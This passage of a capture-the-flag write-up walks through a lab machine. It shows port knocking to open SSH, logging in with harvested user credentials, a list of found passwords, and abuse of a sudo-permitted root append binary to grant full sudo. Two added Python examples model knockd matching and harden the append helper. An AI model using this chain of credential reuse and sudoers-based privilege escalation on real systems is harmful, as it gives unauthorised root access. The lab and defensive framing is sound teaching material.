command <span class="token operator">=</span> <span class="token operator">/</span>sbin<span class="token operator">/</span>iptables <span class="token operator">-</span>D INPUT <span class="token operator">-</span>s <span class="token operator">%</span>IP<span class="token operator">%</span> <span class="token operator">-</span>p tcp <span class="token comment">--dport 22 -j ACCEPT</span>
tcpflags <span class="token operator">=</span> syn</span></span></span></code></pre><div id="https://www.notion.so/f54c824f91454dce9560fdbb04fe1dc1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">So let's knock on ports 7469, 8475 and 9842 and see whether port 22 opens, as the iptables rule says it should. We can do that with hping3 or with knock, which ships in the knockd package (</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">apt install knockd</code></span><span class="SemanticString">).</span></span></p></div><pre id="https://www.notion.so/ad42a4d4bd8c4db588f99261ded99ddf" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/home/kali# knock -v -d1000 192.168.1.9 7469 8475 9842
hitting tcp 192.168.1.9:7469
hitting tcp 192.168.1.9:8475
hitting tcp 192.168.1.9:9842
root@kali:/home/kali# nmap 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 17:04 EDT
Nmap scan report for example.com (192.168.1.9)
Host is up (0.00056s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:0C:D9:D6 (VMware)</span></span></span></code></pre><div id="https://www.notion.so/d0caa7938c7149e38a112db38d633389" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can see that port 22 is now open! Time to try logging in with the users we obtained.</span></span></p></div><div id="https://www.notion.so/f6b0de351a88485ca5cd78895658ee56" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It took several attempts, of course, but let's go straight to the one that worked. Let's log in as Donald Trump!</span></span></p></div><div id="https://www.notion.so/25f99c36621f4a80be5f45171a962309" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2d9fc7b8-2cc5-4b68-bdbd-06493c3e6ed4%2FUntitled.png?width=304&table=block&id=25f99c36-621f-4a80-be5f-45171a962309"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2d9fc7b8-2cc5-4b68-bdbd-06493c3e6ed4%2FUntitled.png?width=304&table=block&id=25f99c36-621f-4a80-be5f-45171a962309" style="width:304px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/32c99c66bc8648b4b3f458bc18d04142" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb1adba97-237b-4e21-8c27-97cb1b7d9d17%2FUntitled.png?width=725&table=block&id=32c99c66-bc86-48b4-b3f4-58bc18d04142"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb1adba97-237b-4e21-8c27-97cb1b7d9d17%2FUntitled.png?width=725&table=block&id=32c99c66-bc86-48b4-b3f4-58bc18d04142" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/be9b6a0f93d949c18e676aff3e183888" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We obtain a few more passwords!</span></span></p></div><pre id="https://www.notion.so/8642602e14354013ac6d0a0a1c10c0a4" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>.secrets-for-putin/passwords-found-on-post-it-notes.txt
</span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts</span></mark></span></span></code></pre><div id="https://www.notion.so/0f94f8da6cc040e38974e497e48bb0f0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let's check whether janitor has sudo permission.</span></span></p></div><div id="https://www.notion.so/6521d2378a3d4d5c9154f6357ae99923" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F798af9f0-7398-458d-95f2-47a8d96be8d4%2FUntitled.png?width=662&table=block&id=6521d237-8a3d-4d5c-9154-f6357ae99923"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F798af9f0-7398-458d-95f2-47a8d96be8d4%2FUntitled.png?width=662&table=block&id=6521d237-8a3d-4d5c-9154-f6357ae99923" style="width:662px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/447bb95fdfaa44ff8905b92e7a163a07" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">There is a user whose description says he is the System Administrator. Let's try the passwords we obtained to see whether we can authenticate as that user.</span></span></p></div><div id="https://www.notion.so/dc38cbc13479473ebd04d48bec520c15" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5ad22a0b-2f2b-46bb-b0af-3396afaece9c%2FUntitled.png?width=294&table=block&id=dc38cbc1-3479-473e-bd04-d48bec520c15"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5ad22a0b-2f2b-46bb-b0af-3396afaece9c%2FUntitled.png?width=294&table=block&id=dc38cbc1-3479-473e-bd04-d48bec520c15" style="width:294px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/fd124c1a495a4623957080830f2c1a9e" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F585b1027-5f59-44dc-9089-97471a361871%2FUntitled.png?width=517&table=block&id=fd124c1a-495a-4623-9570-80830f2c1a9e"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F585b1027-5f59-44dc-9089-97471a361871%2FUntitled.png?width=517&table=block&id=fd124c1a-495a-4623-9570-80830f2c1a9e" style="width:517px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/41346a7d9d2e456485b2a02b07247c49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Since he is the System Admin, let's see whether he has sudo permission.</span></span></p></div><div id="https://www.notion.so/c15745d4f8eb40498a9bf67b12679c21" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc418699-87b6-437d-8577-84a73e00a179%2FUntitled.png?width=984&table=block&id=c15745d4-f8eb-4049-8a9b-f67b12679c21"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc418699-87b6-437d-8577-84a73e00a179%2FUntitled.png?width=984&table=block&id=c15745d4-f8eb-4049-8a9b-f67b12679c21" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/35f64472d98846949b2e15176990d23a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">He does: he has sudo permission to run the binary at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/opt/devstuff/dist/test/test</code></span><span class="SemanticString">.</span></span></p></div><div id="https://www.notion.so/f17321a0ae2e4d439c9ac783cd94d8bb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let's run it and see what it does.</span></span></p></div><div id="https://www.notion.so/638a0a5a2b774218b25318c94600a5a9" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa8ff0470-171a-4bb9-8848-6739304b206c%2FUntitled.png?width=906&table=block&id=638a0a5a-2b77-4218-b253-18c94600a5a9"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa8ff0470-171a-4bb9-8848-6739304b206c%2FUntitled.png?width=906&table=block&id=638a0a5a-2b77-4218-b253-18c94600a5a9" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/d3005d767faf4899b6b33978e1cb5407" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It is a binary, apparently compiled Python, that expects two parameters: read and append. It seems to take a text or file and append it to another file.</span></span></p></div><div id="https://www.notion.so/5a2b55929b2845c59920100e480cc762" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7cfddda6-eeb5-42ce-8081-5fbee2399710%2FUntitled.png?width=623&table=block&id=5a2b5592-9b28-45c5-9920-100e480cc762"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7cfddda6-eeb5-42ce-8081-5fbee2399710%2FUntitled.png?width=623&table=block&id=5a2b5592-9b28-45c5-9920-100e480cc762" style="width:623px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/2b3f6d9ef10d4bdfafa5a3f396de2f03" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It expects a file, so we create one containing "aaaa".</span></span></p></div><div id="https://www.notion.so/b52856d1eb234e2dbd2232cb6482d0c9" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fecaf852f-a18f-4667-bb6a-4e5a08a7abf6%2FUntitled.png?width=545&table=block&id=b52856d1-eb23-4e2d-bd22-32cb6482d0c9"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fecaf852f-a18f-4667-bb6a-4e5a08a7abf6%2FUntitled.png?width=545&table=block&id=b52856d1-eb23-4e2d-bd22-32cb6482d0c9" style="width:545px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/85e11642047b4bd48263cf6ef3692152" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Done! We have a binary, run as root through sudo, that takes the contents of one file and appends them to another. So how about appending full sudo permission for fredf?!</span></span></p></div><div id="https://www.notion.so/36038e5d09e2428f87cba49be904717c" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F532ddc26-d184-4a4c-ad47-7bddf294c4ce%2FUntitled.png?width=770&table=block&id=36038e5d-09e2-428f-87cb-a49be904717c"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F532ddc26-d184-4a4c-ad47-7bddf294c4ce%2FUntitled.png?width=770&table=block&id=36038e5d-09e2-428f-87cb-a49be904717c" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/6187e9030dba46a6a37916d99be9d280" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">And now the flag.</span></span></p></div><div id="https://www.notion.so/72557bf7482341f7be206b525904e3f4" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F45398cf2-f778-443c-8e5a-2946f055b4c9%2FUntitled.png?width=758&table=block&id=72557bf7-4823-41f7-be20-6b525904e3f4"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F45398cf2-f778-443c-8e5a-2946f055b4c9%2FUntitled.png?width=758&table=block&id=72557bf7-4823-41f7-be20-6b525904e3f4" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></article>
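<p class="Text__Content">As an added example (not code from the writeup), the following Python script replays SYNs against the knockd.conf quoted above so the matching rules behind the knock command become visible: the openSSH door fires only when 7469, 8475 and 9842 arrive in order and within seq_timeout, and the closeSSH door is the same ports reversed. The configuration string is reconstructed from the writeup's knockd.conf; the timestamps and the source address 192.168.1.10 are constructed. The matcher is a simplified model of knockd (one attempt per source at a time, dropped on a wrong port or on timeout), not knockd's own code.</p>

```python
"""Replay TCP SYNs against a knockd-style configuration.

Added example, not the writeup's code. KNOCKD_CONF is reconstructed from
the knockd.conf quoted in the writeup; timestamps and the source address
192.168.1.10 are constructed. The matching is a simplified model of knockd:
one attempt per source at a time, dropped on a wrong port or on timeout.
"""
import re
from dataclasses import dataclass

KNOCKD_CONF = """
[options]
logfile = /var/log/knockd.log

[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""


@dataclass
class KnockRule:
    name: str
    sequence: list      # ports that must be hit, in this order
    seq_timeout: int    # seconds allowed between the first and the last knock
    command: str        # run with %IP% replaced by the knocker's address


def parse_knockd_conf(text):
    """Minimal knockd.conf reader: every section with a 'sequence' is a door."""
    rules, section, opts = [], None, {}

    def flush():
        if section and "sequence" in opts:
            ports = [int(p.split(":")[0]) for p in opts["sequence"].split(",")]  # "port" or "port:proto"
            rules.append(KnockRule(section, ports, int(opts["seq_timeout"]), opts.get("command", "")))

    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            flush()
            section, opts = header.group(1), {}
            continue
        key, _, value = line.partition("=")
        opts[key.strip()] = value.strip()
    flush()
    return rules


class KnockMonitor:
    def __init__(self, rules):
        self.rules = rules
        self.watched = {p for r in rules for p in r.sequence}
        self.attempts = {}   # src -> {"rule", "stage", "started"}: one attempt per source
        self.fired = []      # (time, src, command) for every completed door

    def syn(self, t, src, dport):
        """Feed one SYN; return the name of the door it completed, if any."""
        if dport not in self.watched:
            return None                      # knockd's capture filter never sees it
        att = self.attempts.get(src)
        if att and t - att["started"] > att["rule"].seq_timeout:
            del self.attempts[src]           # took too long: the attempt expires
            att = None
        if att is None:
            for rule in self.rules:          # only a door's first port starts an attempt
                if dport == rule.sequence[0]:
                    att = self.attempts[src] = {"rule": rule, "stage": 0, "started": t}
                    break
            else:
                return None
        rule = att["rule"]
        if dport != rule.sequence[att["stage"]]:
            del self.attempts[src]           # wrong port: attempt fails, packet is not reused
            return None
        att["stage"] += 1
        if att["stage"] < len(rule.sequence):
            return None
        del self.attempts[src]
        self.fired.append((t, src, rule.command.replace("%IP%", src)))
        return rule.name


def replay(knocks, conf=KNOCKD_CONF):
    """Replay (time, src, dport) SYNs; return the commands knockd would run."""
    mon = KnockMonitor(parse_knockd_conf(conf))
    for t, src, dport in knocks:
        mon.syn(t, src, dport)
    return [cmd for _, _, cmd in mon.fired]


# Constructed scenarios; knock -d1000 sends one SYN per second, as in the writeup.
SRC = "192.168.1.10"
GOOD_KNOCK = [(0.0, SRC, 7469), (1.0, SRC, 8475), (2.0, SRC, 9842)]
SLOW_KNOCK = [(0.0, SRC, 7469), (10.0, SRC, 8475), (30.0, SRC, 9842)]   # 30 s > seq_timeout
WRONG_ORDER = [(0.0, SRC, 7469), (1.0, SRC, 9842), (2.0, SRC, 8475)]
CLOSE_KNOCK = [(3.0, SRC, 9842), (4.0, SRC, 8475), (5.0, SRC, 7469)]

if __name__ == "__main__":
    for label, knocks in [("good", GOOD_KNOCK), ("slow", SLOW_KNOCK),
                          ("wrong order", WRONG_ORDER), ("open then close", GOOD_KNOCK + CLOSE_KNOCK)]:
        print(f"{label}: {replay(knocks) or 'no rule fired'}")
```

<p class="Text__Content">Two things the replay makes concrete for a defender: the ACCEPT rule knockd inserts is scoped to the knocking address (the %IP% substitution), so it stays in place for that host until the closeSSH sequence runs; and the whole gate is only as secret as knockd.conf, since anyone who can read that file has the sequence. Port knocking hides a service from casual scanning but is not a substitute for key-based SSH authentication and host-level access control.</p>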
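<p class="Text__Content">The privilege escalation above works because a root-executed helper appends to any destination its caller names. As an added example (not the writeup's code; the source of /opt/devstuff/dist/test/test is not shown, and ALLOWED_DEST_DIR is an assumption), here is a Python reconstruction of the same "read one file, append it to another" behaviour with the destination check such a helper needs before it can be handed out via sudo: the target must resolve inside an allow-listed directory, symlinks are refused, and the file is opened with O_APPEND|O_NOFOLLOW. The demo runs against constructed files in a temporary directory, with a stand-in for /etc/sudoers.</p>

```python
"""Hardened version of a "read one file, append it to another" helper.

Added example, not the writeup's code: the source of
/opt/devstuff/dist/test/test is not shown, so this reconstructs the
behaviour described (two arguments: a file to read and a file to append
to) and adds the destination check that makes such a helper dangerous to
run under sudo when it is missing. ALLOWED_DEST_DIR is an assumption.
"""
import os
import sys
import tempfile
from pathlib import Path

# Assumption: the only directory the helper is ever meant to write into.
ALLOWED_DEST_DIR = Path("/opt/devstuff/data")


class AppendRefused(Exception):
    """Raised when the destination is outside the allowed directory."""


def append_file(src: str, dest: str, allowed_dir: Path = ALLOWED_DEST_DIR) -> int:
    """Append the bytes of src to dest; return the number of bytes written.

    Without the checks below, a caller allowed to run this as root could
    pass dest=/etc/sudoers, which is exactly what the writeup does.
    """
    allowed = allowed_dir.resolve()
    target = Path(dest)
    if target.is_symlink():
        raise AppendRefused(f"{dest} is a symlink")
    # resolve() follows symlinks in parent components too, so a link inside
    # the allowed directory cannot be used to reach a file outside it
    if allowed not in target.resolve().parents:
        raise AppendRefused(f"{dest} is outside {allowed}")
    with open(src, "rb") as f:
        data = f.read()
    # O_APPEND|O_NOFOLLOW: the final component is opened without following
    # a link, and the file is never truncated or rewritten, only extended
    fd = os.open(target, os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW, 0o640)
    with os.fdopen(fd, "ab") as out:
        out.write(data)
    return len(data)


def demo() -> dict:
    """Exercise the helper in a throwaway directory (constructed sample data)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        allowed = root / "data"
        allowed.mkdir()
        src = root / "input.txt"
        src.write_text("aaaa\n")                       # the writeup's test input
        sudoers = root / "sudoers"                     # stand-in for /etc/sudoers
        sudoers.write_text("root ALL=(ALL) ALL\n")
        link = allowed / "innocent.txt"
        link.symlink_to(sudoers)                       # a link from inside the allowed dir

        written = append_file(str(src), str(allowed / "log.txt"), allowed)
        refused = []
        for label, dest in (("outside", sudoers), ("symlink", link)):
            try:
                append_file(str(src), str(dest), allowed)
            except AppendRefused:
                refused.append(label)
        return {
            "written": written,
            "log": (allowed / "log.txt").read_text(),
            "refused": refused,
            "sudoers": sudoers.read_text(),           # must be unchanged
        }


if __name__ == "__main__":
    if len(sys.argv) == 3:
        print(append_file(sys.argv[1], sys.argv[2]), "bytes appended")
    else:
        print(demo())
```

<p class="Text__Content">The path check still leaves a small race on the parent directories between resolve() and os.open(), which is why the real fix is not to grant sudo on a root-running file writer at all: a sudoers entry that lets a user run an arbitrary-append tool as root is equivalent to giving that user root.</p>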
<footer class="Footer">
<div>© www.offensivethink.com 2024</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank"
rel="noopener noreferrer">Notablog</a>.
</div>
</footer>
</body>
</html>